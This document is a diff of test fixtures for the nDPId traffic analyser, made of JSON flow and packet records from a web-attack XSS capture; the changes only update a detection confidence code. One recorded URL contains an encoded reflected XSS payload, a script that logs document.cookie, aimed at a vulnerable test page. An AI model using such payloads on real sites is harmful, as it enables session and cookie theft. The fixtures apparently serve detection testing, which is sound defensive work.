00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346957283,"flow_last_seen":1499346960891,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347088637,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52220,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
@@ -340,7 +340,7 @@ 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1137,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1499347101314,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347101314,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8HlBAAD4Gp4CsEAABwKgKMtF4AFDPTHQ7AAAAAKACchDeDgAAAgQFtAQCCAoBOWprAAAAAAEDAwc="} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1138,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":2,"flow_last_seen":1499347101314,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347101314,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0XjCGItuz0x0PKAScSBRoQAAAgQFtAQCCAoD4zviATlqawEDAwc="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1139,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":3,"flow_last_seen":1499347101315,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347101315,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0HlFAAD4Gp4esEAABwKgKMtF4AFDPTHQ8whiLb4AQAOXwqAAAAQEICgE5amsD4zvi"} 
-00972{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1149,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347097460,"flow_last_seen":1499347102358,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347102358,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53584,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00972{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1149,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347097460,"flow_last_seen":1499347102358,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347102358,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53584,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1153,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347102609,"flow_last_seen":1499347102609,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347102609,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53638,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1153,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1499347102609,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347102609,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ux5AAD4GCrKsEAABwKgKMtGGAFBKzdCxAAAAAKACchAExgAAAgQFtAQCCAoBOWuvAAAAAAEDAwc="} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":2,"flow_last_seen":1499347102609,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347102609,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0YYGn50FSs3QsqAScSAg+AAAAgQFtAQCCAoD4z0lATlrrwEDAwc="} 
@@ -357,8 +357,8 @@ 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1195,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1499347107719,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347107719,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8GMdAAD4GrQmsEAABwKgKMtG8AFANSWhrAAAAAKACchClXQAAAgQFtAQCCAoBOXCsAAAAAAEDAwc="} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1196,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":2,"flow_last_seen":1499347107719,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347107719,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0byrN2AMDUlobKAScSBU8gAAAgQFtAQCCAoD40IjATlwrAEDAwc="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1197,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":3,"flow_last_seen":1499347107720,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347107720,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0GMhAAD4GrRCsEAABwKgKMtG8AFANSWhsqzdgDYAQAOXz+AAAAQEICgE5cK0D40Ij"} 
-00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1499346976677,"flow_last_seen":1499346982914,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5330,"flow_tot_l4_payload_len":6852,"flow_avg_l4_payload_len":527,"midstream":0,"thread_ts_msec":1499347109003,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52300,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499346976999,"flow_last_seen":1499346982906,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1707,"flow_tot_l4_payload_len":2065,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1499347109003,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52318,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1499346976677,"flow_last_seen":1499346982914,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5330,"flow_tot_l4_payload_len":6852,"flow_avg_l4_payload_len":527,"midstream":0,"thread_ts_msec":1499347109003,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52300,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499346976999,"flow_last_seen":1499346982906,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1707,"flow_tot_l4_payload_len":2065,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1499347109003,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52318,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346976999,"flow_last_seen":1499346982607,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347109003,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52320,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346976999,"flow_last_seen":1499346982607,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347109003,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346983175,"flow_last_seen":1499346988608,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347109003,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52386,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
@@ -535,7 +535,7 @@ 00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347030639,"flow_last_seen":1499347036617,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52884,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347034467,"flow_last_seen":1499347039618,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52924,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347034467,"flow_last_seen":1499347039618,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52924,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":315,"flow_first_seen":1499346976603,"flow_last_seen":1499347036773,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4344,"flow_tot_l4_payload_len":231560,"flow_avg_l4_payload_len":735,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52298,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":315,"flow_first_seen":1499346976603,"flow_last_seen":1499347036773,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4344,"flow_tot_l4_payload_len":231560,"flow_avg_l4_payload_len":735,"midstream":0,"thread_ts_msec":1499347160658,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52298,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1635,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347163177,"flow_last_seen":1499347163177,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347163177,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54268,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1635,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":1499347163177,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347163177,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8YKVAAD4GZSusEAABwKgKMtP8AFCcucZwAAAAAKACchB\/fgAAAgQFtAQCCAoBOabVAAAAAAEDAwc="} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1636,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":2,"flow_last_seen":1499347163177,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347163177,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0\/zGVu0LnLnGcaAScSBQzAAAAgQFtAQCCAoD43hLATmm1QEDAwc="} 
@@ -548,7 +548,7 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1659,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":1,"flow_last_seen":1499347165741,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347165741,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vRVAAD4GCLusEAABwKgKMtQYAFCo9hRDAAAAAKACchAi0gAAAgQFtAQCCAoBOalWAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1660,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":2,"flow_last_seen":1499347165741,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347165741,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1BjYjd6VqPYURKAScSDt3QAAAgQFtAQCCAoD43rMATmpVgEDAwc="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1661,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":3,"flow_last_seen":1499347165742,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347165742,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vRZAAD4GCMKsEAABwKgKMtQYAFCo9hRE2I3eloAQAOWM5QAAAQEICgE5qVYD43rM"} 
-01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1671,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347163177,"flow_last_seen":1499347167004,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347167004,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54268,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%270XVM4C1CNSWY8VF443GGZ6W527WBY4H29E2XQNGG2QUPQEKW0U%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1671,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347163177,"flow_last_seen":1499347167004,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347167004,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54268,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%270XVM4C1CNSWY8VF443GGZ6W527WBY4H29E2XQNGG2QUPQEKW0U%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1678,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347168302,"flow_last_seen":1499347168302,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347168302,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54322,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1678,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1499347168302,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347168302,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8pdZAAD4GH\/qsEAABwKgKMtQyAFAP+Q4AAAAAAKACchC\/eAAAAgQFtAQCCAoBOavWAAAAAAEDAwc="} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1679,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":2,"flow_last_seen":1499347168302,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347168302,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1DJusJVZD\/kOAaAScSA7HQAAAgQFtAQCCAoD431NATmr1gEDAwc="} 
@@ -739,7 +739,7 @@ 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2123,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":1499347221694,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347221694,"pkt":"ABm5CmnxAMGxFOsxCABFAAA89JJAAD4G0T2sEAABwKgKMtZqAFAcVCtpAAAAAKACchBfVwAAAgQFtAQCCAoBOd\/7AAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":2,"flow_last_seen":1499347221695,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347221695,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1mpdkOZGHFQraqAScSBnCgAAAgQFtAQCCAoD47FxATnf+wEDAwc="} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2125,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":3,"flow_last_seen":1499347221695,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347221695,"pkt":"ABm5CmnxAMGxFOsxCABFAAA09JNAAD4G0USsEAABwKgKMtZqAFAcVCtqXZDmR4AQAOUGEgAAAQEICgE53\/sD47Fx"} 
-00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347033203,"flow_last_seen":1499347101320,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232677,"flow_avg_l4_payload_len":750,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52910,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347033203,"flow_last_seen":1499347101320,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232677,"flow_avg_l4_payload_len":750,"midstream":0,"thread_ts_msec":1499347221700,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52910,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
